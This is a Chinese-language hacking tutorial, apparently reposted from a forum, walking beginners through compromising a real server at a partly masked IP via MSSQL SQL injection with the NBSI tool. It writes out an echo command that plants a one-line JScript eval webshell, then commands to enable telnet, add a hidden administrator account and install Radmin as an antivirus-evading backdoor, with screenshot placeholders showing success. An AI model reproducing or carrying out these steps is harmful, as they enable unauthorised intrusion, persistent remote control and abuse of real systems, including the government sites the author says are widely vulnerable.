| 关键词: 如图 运行 木马 740 undefined rain nbsp Command 好用 成功 |
作者:rain,xr 文章来源:黑暗天堂 以下文章给菜鸟一个小思路,谢谢观赏。 虽然最近序列号不能用了,但相信大家已经能用上功能比较全的NBSI2.0了吧,可怜挡住了小竹的发财路呀。默哀3分钟。 这次的目标是61.240.*.*,经过NBSI检测有注入漏洞,是mssql,sa连接。这就等于告诉我们,我这里有洞,进来呀,要干什么都行。 很多政府网站这种漏洞多多,大家不要干坏事呀。 先看NBSI的检测结果,如图1: 740)this.width=740" border=undefined> 运行SET,可以得到一些信息,WIN2000,主页是ASP系统。好了,我们来上传木马。本来用的是臭要饭的webshell,但是写出来后垃圾东西太多了,不好用。这次,我们直接用echo来写个小木马。 在NB Command里,输入: Echo ^<SCRIPT RUNAT=SERVER LANGUAGE=javascript^> eval (Request.form('rain')+' ') ^</SCRIPT^>>d:\iis\TSDZ-WEB\cn\firm\disp.asp 这里我们必须注意的是,用echo这个命令写<>时,前面必须加个^,才能正常写入。上面的输入仍然不对,我们还需要将+号转化为%2B,这样就可以成功写入密码为rain的冰狐木马了。 好了,打开冰狐的网页木马,run一下系统信息,结果就出来了,如图2: 740)this.width=740" border=undefined> 再用这个木马上传我们的海洋2005a,还有我们常用的upload.asp,uploadclass.asp(上篇我们提过的,无组件上传rain修改版的,上传文件超级好用。) 这里插讲开23端口也就是telnet的问题。在NB Command里,我们运行: Net start telnet 这里不用上传ntml.exe,我们先NB Command里运行 Net user xr rain /add Net localgroup administrators xr /add 再在自己的机子上建立用户名和密码一样的用户xr。在桌面上建立一个cmd的快捷方式,右键,使用xr这个用户来运行: telnet 61.240.*.* 看,成功的饶开了ntml,如图3。 740)this.width=740" border=undefined> 好了,上传r_server.exe,admdll.dll,raddrv.dll,来开4899,我们可爱的RADMIN。(为什么用RADMIN?因为它不会被杀。) 在NB Command里,把上面传过去的文件copy到c:\winnt\system32\里,然后依次运行: r_server /install net start r_server r_server /pass:rain /save 740)this.width=740" border=undefined> 回显成功。呵呵,好了,用RADMIN的TELNET试着连接,成功了,如图4。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|